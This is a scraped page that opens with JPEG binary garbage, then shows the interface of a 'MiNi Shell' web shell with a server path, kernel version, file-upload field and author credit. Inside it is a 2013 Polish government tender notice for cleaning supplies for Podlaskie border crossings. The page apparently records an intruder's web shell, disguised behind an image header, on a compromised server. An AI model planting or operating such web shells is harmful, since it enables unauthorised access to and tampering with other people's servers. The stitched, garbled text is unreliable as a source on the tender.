JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130306/34355-N-2013.html

<p class="kh_header"><b>Białystok: Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych.</b><br>
<b>Numer ogłoszenia: 34355 - 2013; data zamieszczenia: 06.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewoda Podlaski , ul. Mickiewicza 3, 15-213 Białystok, woj. podlaskie, tel. 85 7439387, faks 85 7439254.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby przejść granicznych województwa podlaskiego i Wojewódzkiego Zespołu ds. Orzekania o Niepełnosprawności. Przedmiot zamówienia podzielony jest na pięć zadań:
1)	Zadanie nr 1 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Kuźnicy Białostockiej, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Kuźnicy Białostockiej;
2)	Zadanie nr 2 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Bobrownikach, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Bobrownikach;
3)	Zadanie nr 3 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Białowieży, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Białowieży;
4)	Zadanie Nr 4 - dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby drogowego przejścia granicznego w Połowcach, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Połowcach;
5)	Zadanie Nr 5 - dostawa środków czystości, środków higienicznych na potrzeby Wojewódzkiego Zespołu ds. Orzekania o Niepełnosprawności, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy w Białymstoku przy ul. Mickiewicza 3.
2.	Ilości wskazane w załączniku nr 6 do SIWZ są wielkościami ostatecznymi i nie ulegną zmianie. Zamawiający nie przewiduje   możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 ustawy.
3.	Szczegółowy opis przedmiotu zamówienia zawiera formularz cenowy stanowiący załącznik nr 6 do SIWZ.
4.	Zamawiający dopuszcza składanie ofert częściowych. Wykonawca może złożyć ofertę na jedno, kilka lub na wszystkie zadania. Nie dopuszcza się dzielenia zadań.
5.	Oferowane produkty muszą być dopuszczone do obrotu na rynek polski. Na każdym opakowaniu jednostkowym produktu musi znajdować się termin ważności (data przydatności do użycia) oraz instrukcja użytkowania w języku polskim. Zamawiający wymaga, aby okres ważności produktu (przydatności do użycia) wynosił minimum 12 miesięcy, licząc od daty dostawy do Zamawiającego. Produkty należy dostarczyć w nienaruszonych opakowaniach.
6.	Wskazanie w opisie przedmiotu zamówienia nazwy lub producenta ma na celu określenie klasy produktu, jego jakości oraz służy ustaleniu standardu produktu. Wszędzie tam, gdzie w opisie przedmiotu zamówienia zawartym w niniejszej specyfikacji występują opisane powyżej określenia, Zamawiający dopuszcza produkty równoważne.
7.	Zamawiający przez produkty równoważne rozumie produkty innego producenta, niż wykazany w opisie przedmiotu zamówienia, z zastrzeżeniem, że oferowane produkty muszą być nie gorszej jakości. Poprzez jakość Zamawiający rozumie zachowanie parametrów chemicznych, tzn. artykuły równoważne muszą posiadać tą samą substancję czynną o tym samym stężeniu, co produkty wymienione w opisie przedmiotu zamówienia.
8.	Wykonawcy, którzy zaoferują równoważne produkty do opisanych w specyfikacji, zobowiązani są w myśl art. 30 ust. 5 ustawy wykazać, opisując produkt równoważny w kolumnie nr 5 załącznika nr 6 do SIWZ, że oferowane przez nich produkty spełniają wymagania określone przez Zamawiającego. 
9.	Termin i sposób realizacji zamówienia:
1)	w zakresie zadań od 1 do 4: 
a)	dwie dostawy w okresie od dnia zawarcia umowy do 31.12.2013 r. w terminach i ilościach określonych przez Zamawiającego; przewiduje się, że pierwsza dostawa nastąpi w marcu, zaś druga dostawa w sierpniu 2013 roku;
b)	czas realizacji dostawy - do 5 dni roboczych od momentu przesłania zamówienia faksem, w dni robocze, w godzinach pracy Oddziałów Obsługi Przejść Granicznych 730 - 1430;
2)	w zakresie zadania 5:
a)	 nie więcej niż cztery dostawy w okresie od dnia zawarcia umowy do 31.12.2013r. w terminach i ilościach określonych przez Zamawiającego;
b)	czas realizacji dostawy - do 5 dni roboczych od momentu przesłania zamówienia faksem, w dni robocze, w godzinach pracy Wojewódzkiego Zespołu ds. Orzekania o Niepełnosprawności 730 - 1500..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 18.42.43.00-0, 33.76.10.00-2, 39.22.43.10-4, 39.22.42.00-0, 39.22.43.30-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a) oświadczenie Wykonawcy potwierdzające, że oferowane produkty są dopuszczone do obrotu na terytorium Rzeczypospolitej Polskiej,
b) kopię aktualnej karty charakterystyki lub karty produktu sporządzone przez producenta oferowanego środka czystości. Produkty, do których należy załączyć karty, są wyszczególnione w załączniku Nr 6 do SIWZ.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto, w celu potwierdzenia braku podstaw do wykluczenia, o których mowa w art. 24 ust. 1 ustawy oraz art. 24 ust. 2 pkt 5 ustawy, Wykonawca składa następujące oświadczenia lub dokumenty:
a)	aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
b)	listę podmiotów należących do tej samej grupy kapitałowej o której mowa w art. 24 ust 2 pkt 5 ustawy, albo informację o tym że nie należy do grupy kapitałowej z wykorzystaniem wzoru stanowiącego załącznik nr 4 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bialystok.uw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Oddział ds Zamówień Publicznych Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul.Mickiewicza3, 15-213 Białystok, pokój nr 50..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2013 godzina 10:00, miejsce: sekretariat Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul.Mickiewicza3, 15-213 Białystok, pokój nr 49 (parter)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Osoba upoważniona do porozumiewania się z wykonawcami - Karol Palanis, inspektor w Oddziale ds Zamówień Publicznych Biura Organizacji i Kadr Podlaskiego Urzędu Wojewódzkiego w Białymstoku, ul. Mickiewicza 3, pokój nr 50, tel. 85 74 39 387, faks 85 74 39 254, w godz. 9:00 - 15:00, e-mail: kpalanis@bialystok.uw.gov.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Kuźnicy Białostockiej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Kuźnicy Białostockiej, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Kuźnicy Białostockiej;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 18.42.43.00-0, 33.76.10.00-2, 39.22.43.10-4, 39.22.42.00-0, 39.22.43.30-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Bobrownikach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Bobrownikach, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Bobrownikach;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 18.42.43.00-0, 33.76.10.00-2, 39.22.43.10-4, 39.22.42.00-0, 39.22.43.30-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Białowieży..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby międzynarodowego drogowego przejścia granicznego w Białowieży, określonych w formularzu cenowym stanowiącym załącznik nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Białowieży..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 18.42.43.00-0, 33.76.10.00-2, 39.22.43.10-4, 39.22.42.00-0, 39.22.43.30-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby drogowego przejścia granicznego w Połowcach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystości, środków higienicznych i drobnych artykułów gospodarczych na potrzeby drogowego przejścia granicznego w Połowcach, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy do Oddziału Obsługi Przejść Granicznych w Połowcach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9, 18.14.10.00-9, 18.42.43.00-0, 33.76.10.00-2, 39.22.43.10-4, 39.22.42.00-0, 39.22.43.30-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa środków czystości, środków higienicznych na potrzeby Wojewódzkiego Zespołu ds. Orzekania o Niepełnosprawności..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa środków czystości, środków higienicznych na potrzeby Wojewódzkiego Zespołu ds. Orzekania o Niepełnosprawności, określonych w załączniku nr 6 do SIWZ, z miejscem dostawy w Białymstoku przy ul. Mickiewicza 3..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com